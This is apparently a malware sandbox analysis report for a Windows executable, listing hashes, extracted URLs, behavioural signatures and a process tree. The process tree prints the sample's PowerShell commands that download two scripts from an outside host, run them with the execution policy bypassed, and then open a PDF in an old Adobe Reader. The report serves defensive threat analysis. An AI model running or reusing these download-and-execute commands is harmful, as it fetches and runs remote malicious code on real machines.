Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
334c2047d0b...0N.exe
windows7-x64
1034c2047d0b...0N.exe
windows10-2004-x64
1034c2047d0b...0N.exe
android-11-x64
34c2047d0b...0N.exe
android-13-x64
34c2047d0b...0N.exe
macos-10.15-amd64
34c2047d0b...0N.exe
ubuntu-18.04-amd64
34c2047d0b...0N.exe
debian-9-armhf
34c2047d0b...0N.exe
debian-9-mips
34c2047d0b...0N.exe
debian-9-mipsel
Resubmissions
21/01/2025, 12:01
250121-n61zrssrbr 1021/01/2025, 11:10
250121-m9zqfazqh1 1016/07/2024, 00:12
240716-ahlnaayeqf 10Analysis
-
max time kernel
106s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
21/01/2025, 11:10
Static task
static1
Behavioral task
behavioral1
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral4
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
android-33-x64-arm64-20240624-en
Behavioral task
behavioral5
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
macos-20241106-en
Behavioral task
behavioral6
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral8
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral9
Sample
34c2047d0b69ba023b700c21431accc0N.exe
Resource
debian9-mipsel-20240729-en
General
-
Target
34c2047d0b69ba023b700c21431accc0N.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Signatures
-
pid Process 2000 powershell.exe 3016 powershell.exe 2768 powershell.exe 2872 powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral1/files/0x000700000001961c-60.dat pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2764 timeout.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2288 AcroRd32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2000 powershell.exe 3016 powershell.exe 2872 powershell.exe 2768 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2288 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2288 AcroRd32.exe 2288 AcroRd32.exe 2288 AcroRd32.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1096 wrote to memory of 1476 1096 34c2047d0b69ba023b700c21431accc0N.exe 30 PID 1096 wrote to memory of 1476 1096 34c2047d0b69ba023b700c21431accc0N.exe 30 PID 1096 wrote to memory of 1476 1096 34c2047d0b69ba023b700c21431accc0N.exe 30 PID 1476 wrote to memory of 2000 1476 cmd.exe 32 PID 1476 wrote to memory of 2000 1476 cmd.exe 32 PID 1476 wrote to memory of 2000 1476 cmd.exe 32 PID 1476 wrote to memory of 3016 1476 cmd.exe 33 PID 1476 wrote to memory of 3016 1476 cmd.exe 33 PID 1476 wrote to memory of 3016 1476 cmd.exe 33 PID 1476 wrote to memory of 2872 1476 cmd.exe 34 PID 1476 wrote to memory of 2872 1476 cmd.exe 34 PID 1476 wrote to memory of 2872 1476 cmd.exe 34 PID 1476 wrote to memory of 2768 1476 cmd.exe 35 PID 1476 wrote to memory of 2768 1476 cmd.exe 35 PID 1476 wrote to memory of 2768 1476 cmd.exe 35 PID 1476 wrote to memory of 2764 1476 cmd.exe 36 PID 1476 wrote to memory of 2764 1476 cmd.exe 36 PID 1476 wrote to memory of 2764 1476 cmd.exe 36 PID 1476 wrote to memory of 2288 1476 cmd.exe 37 PID 1476 wrote to memory of 2288 1476 cmd.exe 37 PID 1476 wrote to memory of 2288 1476 cmd.exe 37 PID 1476 wrote to memory of 2288 1476 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exeC:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe sh $MOZILLA\\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL"1⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DD7.tmp\7DD8.tmp\7DD9.bat C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe sh $MOZILLA\\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL""2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2764
-
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2288
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
3KB
MD59ebfe419a053661ac76f942a4ac8ab40
SHA1241c9c805682e751f257adab261e23ebcaa553cb
SHA256f3e5e2c2a3f8e4acb007fd049ebf003843a94992befd51e0c1a9e24af0b9936d
SHA5125e18af05b46036683b5b8cb6b5cf17333e48ff85fc8bf890180705e480a2d3e4ec780dfe9276306fb9baa7a2e82e7bab24e8309610b8eabbe4cbea3e7893871e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD579d22fe1adc4829d894b90115218a5f8
SHA1dedc5b5e4679b6eae1532d1d14dc0b5dd0aa112d
SHA2567e96e31ae35536df08be7649b632565294497dc75375a9bcc210f2e82a637fc6
SHA512c3d3e3bdf915d143bbad266eeb2e1187dbeb3469d200f44bff977da01e3ed9325d55c05bd53537d51ea2b8910e98fb8c448b95643af0f029aeccd3961131b2a4
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288